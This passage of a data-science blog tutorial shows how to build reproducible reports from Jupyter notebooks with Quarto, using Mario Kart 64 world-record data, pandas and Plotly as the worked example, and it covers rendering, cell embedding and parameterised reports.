&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Abstract
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Investigating how the world record for Rainbow Road in Mario Kart 64
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;developed over time.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Introduction
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Mario Kart 64 is a racing video game developed and published by
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#7ee787"&gt;Nintendo&lt;/span&gt;](https://en.wikipedia.org/wiki/Nintendo) for the
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#7ee787"&gt;Nintendo 64&lt;/span&gt;](https://en.wikipedia.org/wiki/Nintendo_64).
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Players can choose from eight characters to race as, including:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; Mario
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; Toad
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; Princess Peach
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;The game consists of 16 tracks to race around. World records can be
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;set for either one lap or a full race (three laps) of the course. As
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;players have competed for faster times, several track shortcuts have
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;been discovered. There are separate world records for both &lt;span style="font-style:italic"&gt;_with_&lt;/span&gt; and
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="font-style:italic"&gt;_without_&lt;/span&gt; the use of a shortcut.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Methods
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;We loaded a dataset of [&lt;span style="color:#7ee787"&gt;Mario Kart 64&lt;/span&gt;](https://mkwrs.com/) world
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;records. This data is from [&lt;span style="color:#7ee787"&gt;tidytuesday&lt;/span&gt;](https://github.com/rfordatascience/tidytuesday/blob/master/data/2021/2021-05-25/readme.md)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;with credit to [&lt;span style="color:#7ee787"&gt;Benedikt Claus&lt;/span&gt;](https://github.com/benediktclaus).
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;For this investigation we are interested in the world records for
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Rainbow Road over a three-lap course. The dataset was loaded and
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;filtered using pandas:
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;By running the Markdown cell, the text will be rendered so it includes
subheadings, bullet points, italic text fomatting and hyperlinks.&lt;/p&gt;
&lt;p&gt;Next we may wish to display the code used for loading and filtering the data.
Try copying this code into a Python cell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load the records data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;records &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://raw.githubusercontent.com/rfordatascience/tidytuesday/master/data/2021/2021-05-25/records.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Filter the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rainbow_road &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; records&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loc[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (records[&lt;span style="color:#a5d6ff"&gt;&amp;#34;track&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Rainbow Road&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (records[&lt;span style="color:#a5d6ff"&gt;&amp;#34;type&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Three Lap&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;reset_index()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# View the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rainbow_road&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Running this should produce the expected Pandas output, including the first five
rows of the &lt;code&gt;rainbow_road&lt;/code&gt; data.&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s now include some results, starting with a Markdown cell to add the
Results section header and opening text:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Results
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;The figure below shows the development of world records for the Rainbow Road
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;track on Mario Kart 64 from 1997 to 2021.
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We &lt;em&gt;could&lt;/em&gt; insert the figure as a PNG or PDF image. But to make this report
reproducible, let&amp;rsquo;s dynamically generate the figure using a Python code cell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#| echo: false&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#| fig-cap: &amp;#34;Progress of Rainbow Road world records, with and without allowing shortcuts.&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#| fig-width: 8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#| label: wr-plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotly.express&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;px&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;line(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rainbow_road,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;date&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;time&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;shortcut&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Progress of Rainbow Road N64 World Records&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; line_shape&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;hv&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; markers&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;.&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The code chunk options at the top of this cell will make the code invisible in
the rendered document and set the figure caption, width, and label to
our liking. Plotly is used to visualise the world record for Rainbow Road over
time. Try running this code within your notebook to check that it generates a
figure like the one below:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Image of the plot generated by the Plotly code above. The three-lap world record time is plotted against date from 1997 to 2021. Two coloured lines are shown: red for world records with a shortcut, and blue for without a shortcut." height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/graphics/mk64_plot.png" width="1505"&gt;&lt;/p&gt;
&lt;p&gt;Finally, let&amp;rsquo;s quote the longest time a world record was held for using inline
code. Copy this code into a Python cell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#| echo: false&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;IPython.display&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; display, Markdown
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;max_duration &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; rainbow_road&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;record_duration&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;max()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;display(Markdown(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;f&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;The longest a 3 lap world record was held
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;for on Rainbow Road is &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;{&lt;/span&gt;max_duration&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt; days
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;(&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;{&lt;/span&gt;round(max_duration&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;365&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt; years).
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Running this should add the sentence &amp;ldquo;The longest a 3 lap world record was held
for on Rainbow Road is 2214 days (6.1 years).&amp;rdquo;, where the numbers 2214 and 6.1
have been calculated by Python. If more data is added, these numbers can be
updated automatically by re-rendering the notebook.&lt;/p&gt;
&lt;h4 id="rendering-your-notebook"&gt;Rendering your notebook&lt;/h4&gt;
&lt;p&gt;You should now have a complete notebook with a YAML header, Markdown text and
Python code cells. To see how it should look, you can view our notebook &lt;a href="https://github.com/jumpingrivers/blog/blob/main/blogs/2023-quarto-for-jupyter/rainbow_road.ipynb" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To render the report from the command line:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;quarto render &amp;lt;notebook&amp;gt;.ipynb --to html&lt;/code&gt; will render the document as HTML.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;quarto preview &amp;lt;notebook&amp;gt;.ipynb&lt;/code&gt; will generate a live preview which
can be viewed as you edit the notebook.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;quarto render &amp;lt;notebook&amp;gt;.ipynb --execute&lt;/code&gt; will execute the code cells as the
output is generated. Without this, you will need to ensure that you have run
the code cells in the notebook manually, &lt;em&gt;before&lt;/em&gt; quarto is used to render
it.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Upon rendering, an HTML document like the one
&lt;a href="https://jumpingrivers.github.io/blog/rainbow_road.html" rel="external"&gt;here&lt;/a&gt; should be
created.&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s also possible to render the notebook with the VS Code UI. Provided you
have the Quarto extension installed, there should be options to &amp;ldquo;Render&amp;rdquo;,
&amp;ldquo;Render All&amp;rdquo;, &amp;ldquo;Render HTML&amp;rdquo;, &amp;ldquo;Render PDF&amp;rdquo;, and &amp;ldquo;Render DOCX&amp;rdquo;:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot displaying the render options in the VS Code UI. The options are accessed by clicking on the symbol with three dots found in the tool bar. The rendering options include “Render”, “Render All”, “Render DOCX”, “Render HTML” and “Render PDF”." height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/graphics/render-options.png" width="978"&gt;&lt;/p&gt;
&lt;p&gt;Note that the HTML plot generated by Plotly cannot be displayed in a DOCX or
PDF document. Instead we would have to use a static image format like PNG or
PDF.&lt;/p&gt;
&lt;h3 id="cell-embedding"&gt;Cell embedding&lt;/h3&gt;
&lt;p&gt;In Quarto 1.3 a new feature was added that enables you to embed external
Jupyter notebook cells in a Quarto document. This is particularly useful if you
have results from different notebooks that you want to extract into a report.&lt;/p&gt;
&lt;p&gt;As well as investigating the word records set on Rainbow Road, we have also
been looking at those set on Choco Mountain. The results for Choco Mountain are
in a separate &lt;code&gt;choco_mountain.ipynb&lt;/code&gt; &lt;a href="https://github.com/jumpingrivers/blog/blob/main/blogs/2023-quarto-for-jupyter/choco_mountain.ipynb" rel="external"&gt;notebook&lt;/a&gt;.
We might now want to summarise
our various Mario Kart results in a single &lt;code&gt;.qmd&lt;/code&gt; report (see our
&lt;a href="https://www.jumpingrivers.com/blog/quarto-for-python-users/" rel="external"&gt;previous post&lt;/a&gt;
for a guide to &lt;code&gt;.qmd&lt;/code&gt; reports).&lt;/p&gt;
&lt;p&gt;Rather than having to replicate our plotting code, we can embed the relevant
cells from our &lt;code&gt;rainbow_road.ipynb&lt;/code&gt; and &lt;code&gt;choco_mountain.ipynb&lt;/code&gt; notebooks
directly into the &lt;code&gt;.qmd&lt;/code&gt; report:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;---
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;title: &amp;#34;Reporting on Mario Kart 64 World Records&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;author: &amp;#34;Myles Mitchell &amp;amp; Parisa Gregg&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;date: &amp;#34;14 June 2023&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;format: html
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;---
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Rainbow Road
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;The figure below shows the development of world records for the
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Rainbow Road track on Mario Kart 64 from 1997 to 2021.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{{&amp;lt; embed rainbow_road.ipynb&lt;span style="color:#ffa657"&gt;#wr&lt;/span&gt;-plot &amp;gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Choco Mountain
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;The figure below shows the development of world records for the
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Choco Mountain track on Mario Kart 64 from 1997 to 2021.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{{&amp;lt; embed choco_mountain.ipynb&lt;span style="color:#ffa657"&gt;#wr&lt;/span&gt;-plot &amp;gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here we have used the &amp;ldquo;wr-plot&amp;rdquo; label to reference the code cells that produce
the Plotly figures in the Rainbow Road and Choco Mountain reports. These code
cells are now embedded in the &lt;code&gt;.qmd&lt;/code&gt; report and the figures will be visible
in the rendered document (as can be seen &lt;a href="https://jumpingrivers.github.io/blog/mario_cell_embedding.html" rel="external"&gt;here&lt;/a&gt;).&lt;/p&gt;
&lt;h3 id="parameterised-reports"&gt;Parameterised Reports&lt;/h3&gt;
&lt;p&gt;Above we produced a report for the Rainbow Road world records on Mario Kart 64.
There are 16 tracks in total in the game. What if we wanted to replicate this
report for each track? With Quarto and Jupyter notebooks we can define a set of
parameters to easily create different variations of a report.&lt;/p&gt;
&lt;p&gt;To parameterise a Jupyter notebook we need to create a cell with a &amp;ldquo;parameters&amp;rdquo;
tag. To add a parameters tag to a Python cell in VS Code, click on &amp;ldquo;&amp;hellip;&amp;rdquo; (More
Actions) in the cell tool bar and select &amp;ldquo;Add Cell Tag&amp;rdquo;:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot depicting how to add a tag to a notebook cell. The cell actions are expanded by clicking on the symbol with three dots in the cell tool bar. The “Add Cell Tag” option is visible in the dropdown list." height="auto" id="h-rh-i-3" src="https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/graphics/add-cell-tag.png" width="1736"&gt;&lt;/p&gt;
&lt;p&gt;To add a parameters tag we then just type &amp;ldquo;parameters&amp;rdquo; into the pop up box:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot showing the pop up box that appears after selecting the “Add Cell Tag” option. A parameters tag is added by typing “parameters” into the box and pressing Enter." height="auto" id="h-rh-i-4" src="https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/graphics/vscode-tag-box.png" width="1219"&gt;&lt;/p&gt;
&lt;p&gt;The cell should now have a &amp;ldquo;parameters&amp;rdquo; tag:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot showing a code cell after it has been assigned a parameters tag. A “parameters” label is now visible at the lower-left corner of the cell, with an option to add another tag to the right of it." height="auto" id="h-rh-i-5" src="https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/graphics/vscode-parameters-tag.png" width="1728"&gt;&lt;/p&gt;
&lt;p&gt;If we want to have the track as a parameter in the report, we can define a
&lt;code&gt;track&lt;/code&gt; variable in the tagged cell (as above):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;track &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Rainbow Road&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can then use this variable in the remainder of our notebook. For example, it can be used to set the track filter in the data-loading code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load the records data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;records &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://raw.githubusercontent.com/rfordatascience/tidytuesday/master/data/2021/2021-05-25/records.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Filter the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;course_records &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; records&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loc[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (records[&lt;span style="color:#a5d6ff"&gt;&amp;#34;track&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; track) &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (records[&lt;span style="color:#a5d6ff"&gt;&amp;#34;type&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Three Lap&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;reset_index()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The full code for our parameterised &lt;code&gt;mario_kart.ipynb&lt;/code&gt; notebook can be found
&lt;a href="https://github.com/jumpingrivers/blog/blob/main/blogs/2023-quarto-for-jupyter/mario_kart.ipynb" rel="external"&gt;here&lt;/a&gt;.
In this example we have used &lt;code&gt;&amp;quot;Rainbow Road&amp;quot;&lt;/code&gt; as the
